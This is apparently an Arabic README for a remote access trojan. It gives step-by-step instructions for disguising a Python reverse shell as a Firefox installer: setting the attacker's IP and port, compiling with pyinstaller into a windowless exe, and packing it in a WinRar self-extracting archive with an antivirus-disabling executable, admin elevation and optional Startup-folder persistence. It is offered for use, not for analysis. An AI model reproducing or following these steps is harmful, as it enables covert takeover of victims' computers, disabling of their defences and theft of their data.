
حصان طروادة للوصول عن بُعد أُنشئ باستخدام WinRar مع مثبّت فايرفوكس وشل عكسي مدمج بلغة بايثون.
حصان طروادة للوصول عن بُعد تم إنشاؤه باستخدام WinRar مع مُثبّت (مثل: firefox) وقشرة عكسية (Reverse Shell) بلغة Python مدمجة.
عدّل ملف client.py بتعيين عنوان IP والمنفذ لخادم المهاجم الذي يستمع للاتصالات، وعنوان IP والمنفذ لأي بروكسي موجود على جهاز المهاجم. إذا لم يكن هناك بروكسي، علّق على القسم المعني.
حوّل client.py إلى ملف exe؛ استخدمت pyinstaller: pyinstaller -w -i "Firefox.ico" -F client.py. الخيار -w يتيح إنشاء ملف .exe بدون نافذة، والخيار -F يتيح إنشاء ملف واحد فقط.
أنشئ ملف ZIP ذاتي الاستخراج باستخدام WinRar مع تحديد ثلاثة ملفات: مُثبّت غير ضار (مثل: "firefox installer.exe") و client.exe و antivirus.exe. في إعدادات وحدة الاستخراج الذاتي، اضبط ترتيب تنفيذ الملفات بحيث يكون المُثبّت غير الضار أولًا و client.exe ثانيًا؛ حدّد خانة الاختيار لاستخراج الملفات إلى مجلد مؤقت، أو إذا أردت أن تكون أكثر خبثًا، فحدد مجلد الملفات التي سيتم تشغيلها عند الإقلاع (%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). ودائمًا في إعدادات وحدة الاستخراج الذاتي، حدد خيار طلب الوصول بصلاحيات إدارية. الملف antivirus.exe هو ملف .exe بدون نافذة يعطّل برنامج مكافحة الفيروسات. سيتم تشغيله بواسطة client.exe قبل الاتصال بالخادم.
يحتوي ملف antivirus.bat على كود ملف .exe الذي يحمل الاسم نفسه وميزة اختيارية إضافية. استخدمت "Slimm bat to exe.exe" لتحويل ملف .bat إلى ملف .exe بدون نافذة.
استمتع :)